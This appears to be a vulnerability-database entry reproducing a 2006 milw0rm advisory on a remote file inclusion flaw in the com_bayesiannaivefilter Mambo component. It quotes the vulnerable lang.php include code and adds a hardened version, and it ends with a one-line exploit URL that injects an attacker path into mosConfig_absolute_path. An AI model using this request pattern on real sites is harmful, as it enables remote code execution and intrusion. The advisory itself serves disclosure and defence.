Vendor: com_bayesiannaivefilter Mambo Component
By: Pablin77
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 94
Product Name: com_bayesiannaivefilter Mambo Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)

The com_bayesiannaivefilter Mambo component is vulnerable to remote file inclusion. The flaw is caused by the application's failure to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'lang.php' script, which is used directly to build an include path. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code with the privileges of the web server process. This can facilitate unauthorized access or privilege escalation.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of the component.

Exploit-DB raw data:

#############################Pablin77 - XTech Inc Group################################
#
# com_bayesiannaivefilter Mambo Component Remote File Inclusion (mosConfig_absolute_path)
#
#################################################################################
#
# Discovered By Pablin77
#
#
# contact: Pablin_77 [at] Argentina [dot] com
#
#
#          Lebanon-Israel...STOP! No War!!!
#
#                     peace, that's all
#
#  This is a massive cyber-protest, we are :
#
#  eno7 | XTech Inc | byond crew | hackbsd crew | digitalmind
#
#
################################################################################
#
# Greetz: eno7 , Byond Crew
#
# Special Greetz: XTech Inc (Status-x, Furtivo, sys7ech)
#
###############################################################################

code from lang.php (fragment as quoted; the opening of the if block is not shown)

// $mosConfig_absolute_path is taken as-is from the global scope and concatenated
// straight into the include path, so a request-supplied value ends up in include_once().
include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/'.$mosConfig_lang.'.php');
  } else { 
    include_once($mosConfig_absolute_path.'/administrator/components/com_bayesiannaivefilter/languages/english.php');
  }
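A hardened form of the quoted include logic, added here as an example (it is not the advisory's or the component's own code). It assumes the usual Mambo convention that the core defines _VALID_MOS before loading a component and that configuration.php sets $mosConfig_absolute_path and $mosConfig_lang; the language file whitelist is an assumption for illustration.

```php
<?php
// Added example, not from the original advisory or the component.
// Assumes Mambo's convention: index.php defines _VALID_MOS before any
// component file is loaded, and configuration.php sets
// $mosConfig_absolute_path and $mosConfig_lang.

// 1. Refuse direct web requests to this file. A request that fetches
//    lang.php directly never passes through index.php, so _VALID_MOS is
//    undefined and the script dies before any include is evaluated.
//    This is what stops a request-controlled $mosConfig_absolute_path
//    (populated via register_globals) from reaching include_once().
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Do not trust the language name either: strip any directory parts,
//    allow only a plain identifier, and require that the file exists in
//    the component's own languages directory. Anything else falls back
//    to english.php, mirroring the original else branch.
$langDir = $mosConfig_absolute_path
         . '/administrator/components/com_bayesiannaivefilter/languages/';

$requested = isset($mosConfig_lang) ? basename((string) $mosConfig_lang) : 'english';

if (!preg_match('/^[A-Za-z_]+$/', $requested)
    || !is_file($langDir . $requested . '.php')) {
    $requested = 'english';
}

include_once $langDir . $requested . '.php';
```

The _VALID_MOS guard is the fix pattern later applied across Mambo and Joomla components; disabling register_globals and allow_url_include in PHP closes the same class of issue server-wide.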

Web:
http://forge.joomla.org/sf/scm/do/listRepositories/projects.com_bayesianspamfiltering/scm

exploit:
http://site.com/[path]/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[Evilcode]

##############################MARY I LOOOOVE YOU!!!############################
###############################################################################

# milw0rm.com [2006-07-30]